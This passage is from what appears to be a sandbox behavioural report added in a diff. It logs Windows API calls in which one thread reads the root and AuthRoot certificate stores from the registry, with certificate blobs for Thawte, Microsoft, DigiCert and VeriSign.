21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000580" + }, + { + "name": "ObjectAttributesName", + "value": "BE36A4562FB2EE05DBB3D32323ADF445084ED656" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\BE36A4562FB2EE05DBB3D32323ADF445084ED656" + } + ], + "repeated": 0, + "id": 2028 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\BE36A4562FB2EE05DBB3D32323ADF445084ED656\\Blob" + } + ], + "repeated": 1, + "id": 2029 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xe8\\xa5\\x98\\xbe\\x84\\x82\\x8e\\xfe\\xaep\\x11\\x15\\x015v\\xb2\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x7ffzq\\xd3\\xebix \\x9aQ\\x14\\x9d\\x83\\xda \\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xbe6\\xa4V/\\xb2\\xee\\x05\\xdb\\xb3\\xd3##\\xad\\xf4E\\x08N\\xd6V\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00.\\x00\\x00\\x00T\\x00h\\x00a\\x00w\\x00t\\x00e\\x00 \\x00T\\x00i\\x00m\\x00e\\x00s\\x00t\\x00a\\x00m\\x00p\\x00i\\x00n\\x00g\\x00 \\x00C\\x00A\\x00\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x18\\x1c+\\xe0XQ\\xf9i\\x93\\xe1\\x96\\xf2y\\x95K#\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xdd\\xbc\\xbd\\x86\\x9c?\\x07\\xed@\\xe3\\x1b\\x08\\xef\\xce\\xc4\\xd1\\x88\\xcd;\\x15 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xa5\\x02\\x00\\x000\\x82\\x02\\xa10\\x82\\x02\n\\xa0\\x03\\x02\\x01\\x02\\x02\\x01\\x000\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x81\\x8b1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02ZA1\\x150\\x13\\x06\\x03U\\x04\\x08\\x13\\x0cWestern Cape1\\x140\\x12\\x06\\x03U\\x04\\x07\\x13\\x0bDurbanville1\\x0f0\r\\x06\\x03U\\x04\n\\x13\\x06Thawte1\\x1d0\\x1b\\x06\\x03U\\x04\\x0b\\x13\\x14Thawte Certification1\\x1f0\\x1d\\x06\\x03U\\x04\\x03\\x13\\x16Thawte Timestamping CA0\\x1e\\x17\r970101000000Z\\x17\r201231235959Z0\\x81\\x8b1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02ZA1\\x150\\x13\\x06\\x03U\\x04\\x08\\x13\\x0cWestern Cape1\\x140\\x12\\x06\\x03U\\x04\\x07\\x13\\x0bDurbanville1\\x0f0\r" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\BE36A4562FB2EE05DBB3D32323ADF445084ED656\\Blob" + } + ], + "repeated": 0, + "id": 2030 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000584" + } + ], + "repeated": 0, + "id": 2031 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000580" + }, + { + "name": "Index", + "value": "11" + } + ], + "repeated": 0, + "id": 2032 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000580" + }, + { + "name": "ObjectAttributesName", + "value": "CDD4EEAE6000AC7F40C3802C171E30148030C072" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\CDD4EEAE6000AC7F40C3802C171E30148030C072" + } + ], + "repeated": 0, + "id": 2033 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\CDD4EEAE6000AC7F40C3802C171E30148030C072\\Blob" + } + ], + "repeated": 1, + "id": 2034 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000584" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5Jg\\x80\\xc0\\x92i\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x009\\x1b\\xe9(\\x83\\xd5%\t\\x15[\\xfe\\xae'\\xb9\\xbd4\\x01p\\xb7k\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xcd\\xd4\\xee\\xae`\\x00\\xac\\x7f@\\xc3\\x80,\\x17\\x1e0\\x14\\x800\\xc0r\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00J\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00\\x00\\x00i\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x02\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x0e\\xac\\x82`@V'\\x97\\xe5%\\x13\\xfc*\\xe1\nS\\x95Y\\xe4\\xa4 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x9d\\x05\\x00\\x000\\x82\\x05\\x990\\x82\\x03\\x81\\xa0\\x03\\x02\\x01\\x02\\x02\\x10y\\xad\\x16\\xa1J\\xa0\\xa5\\xadLsX\\xf4\\x07\\x13.e0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000_1\\x130\\x11\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\\x03com1\\x190\\x17\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\tmicrosoft1-0+\\x06\\x03U\\x04\\x03\\x13$Microsoft Root Certificate Authority0\\x1e\\x17\r010509231922Z\\x17\r210509232813Z0_1\\x130\\x11\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\\x03com1\\x190\\x17\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\tmicrosoft1-0+\\x06\\x03U\\x04\\x03\\x13$Microsoft Root Certificate A" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\CDD4EEAE6000AC7F40C3802C171E30148030C072\\Blob" + } + ], + "repeated": 0, + "id": 2035 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000584" + } + ], + "repeated": 0, + "id": 2036 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000580" + } + ], + "repeated": 0, + "id": 2037 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000580" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\CRLs" + } + ], + "repeated": 0, + "id": 2038 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000580" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2039 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000580" + } + ], + "repeated": 0, + "id": 2040 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000580" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\CTLs" + } + ], + "repeated": 0, + "id": 2041 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000580" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2042 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000580" + } + ], + "repeated": 0, + "id": 2043 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00568000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2044 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000058c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000053c" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates" + } + ], + "repeated": 0, + "id": 2045 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000058c" + }, + { + "name": "KeyInformation", + "value": "\\xffd4\\xff97\\xff93A\\xffa1\\xff8f\\xffdb\\x01\\x00\\x00\\x00\\x00\t\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2046 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000058c" + }, + { + "name": "Index", + "value": "0" + } + ], + "repeated": 0, + "id": 2047 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000058c" + }, + { + "name": "ObjectAttributesName", + "value": "0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43" + } + ], + "repeated": 0, + "id": 2048 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\\Blob" + } + ], + "repeated": 1, + "id": 2049 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00t\\x99f\\xce\\xcc\\x95\\xc1\\x87A\\x94\\xcar\\x03\\xf9\\xb6 \\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x05c\\xb8c\rb\\xd7Z\\xbb\\xc8\\xab\\x1eK\\xdf\\xb5\\xa8\\x99\\xb2MC\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00O_\\x10i09\\x8d\t\\x10{@\\xc3\\xc7\\xca\\x8f\\x1c\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x12\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00E\\xeb\\xa2\\xaf\\xf4\\x92\\xcb\\x821-Q\\x8b\\xa7\\xa7!\\x9d\\xf3m\\xc8\\x0fb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00>\\x90\\x99\\xb5\\x01^\\x8fHl\\x00\\xbc\\xea\\x9d\\x11\\x1e\\xe7!\\xfa\\xba5Z\\x89\\xbc\\xf1\\xdfiV\\x1e=\\xc62\\\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00m\\xca[\\xd0\r\\xcf\\x1c\\x0f2pY\\xd3t\\xb2\\x9c\\xa6\\xe3\\xc5\n\\xa6 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xbb\\x03\\x00\\x000\\x82\\x03\\xb70\\x82\\x02\\x9f\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x0c\\xe7\\xe0\\xe5\\x17\\xd8F\\xfe\\x8f\\xe5`\\xfc\\x1b\\xf0090\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000e1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x150\\x13\\x06\\x03U\\x04\n\\x13\\x0cDigiCert Inc1\\x190\\x17\\x06\\x03U\\x04\\x0b\\x13\\x10www.digicert.com1$0\"\\x06\\x03U\\x04\\x03\\x13\\x1bDigiCert Ass" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\\Blob" + } + ], + "repeated": 0, + "id": 2050 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000590" + } + ], + "repeated": 0, + "id": 2051 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000058c" + }, + { + "name": "Index", + "value": "1" + } + ], + "repeated": 0, + "id": 2052 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000058c" + }, + { + "name": "ObjectAttributesName", + "value": "4F65566336DB6598581D584A596C87934D5F2AB4" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\4F65566336DB6598581D584A596C87934D5F2AB4" + } + ], + "repeated": 0, + "id": 2053 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\4F65566336DB6598581D584A596C87934D5F2AB4\\Blob" + } + ], + "repeated": 1, + "id": 2054 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xf1\\xbb\\xac-\\x908\\xdd\\xec\\x8d\\xb1s\\xc5;\\xc7**\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00x*\\x02\\xdf\\xdb.\\x14\\xd5\\xa7_\n\\xdf\\xb6\\x8e\\x9c]\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x008\\x00\\x00\\x00V\\x00e\\x00r\\x00i\\x00S\\x00i\\x00g\\x00n\\x00 \\x00C\\x00l\\x00a\\x00s\\x00s\\x00 \\x003\\x00 \\x00P\\x00r\\x00i\\x00m\\x00a\\x00r\\x00y\\x00 \\x00C\\x00A\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00*\\x00\\x00\\x000(\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xe2\\x7f{\\xd8w\\xd5\\xdf\\x9e\n?\\x9e\\xb4\\xcb\\x0e.\\xa9\\xef\\xdbiw\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00'\\xb3Qvg3\\x1c\\xe2\\xc1\\xe7@\\x02\\xb5\\xff\"\\x98\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00OeVc6\\xdbe\\x98X\\x1dXJYl\\x87\\x93M_*\\xb4\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04 \\x00\\x00\\x00\\x01\\x00\\x00\\x00A\\x02\\x00\\x000\\x82\\x02=0\\x82\\x01\\xa6\\x02\\x11\\x00\\xe4\\x9e\\xfd\\xf3:\\xe8\\x0e\\xcf\\xa5\\x11>\\x19\\xa4$\\x0220\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x000_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1705\\x06\\x03U\\x04\\x0b\\x13.Class 3 Public Primary Certification Authority0\\x1e\\x17\r960129000000Z\\x17\r040107235959Z0_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriS" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\4F65566336DB6598581D584A596C87934D5F2AB4\\Blob" + } + ], + "repeated": 0, + "id": 2055 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000590" + } + ], + "repeated": 0, + "id": 2056 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000058c" + }, + { + "name": "Index", + "value": "2" + } + ], + "repeated": 0, + "id": 2057 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000058c" + }, + { + "name": "ObjectAttributesName", + "value": "51501FBFCE69189D609CFAF140C576755DCC1FDF" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\51501FBFCE69189D609CFAF140C576755DCC1FDF" + } + ], + "repeated": 0, + "id": 2058 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000590" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\51501FBFCE69189D609CFAF140C576755DCC1FDF\\Blob" + } + ], + "repeated": 1, + 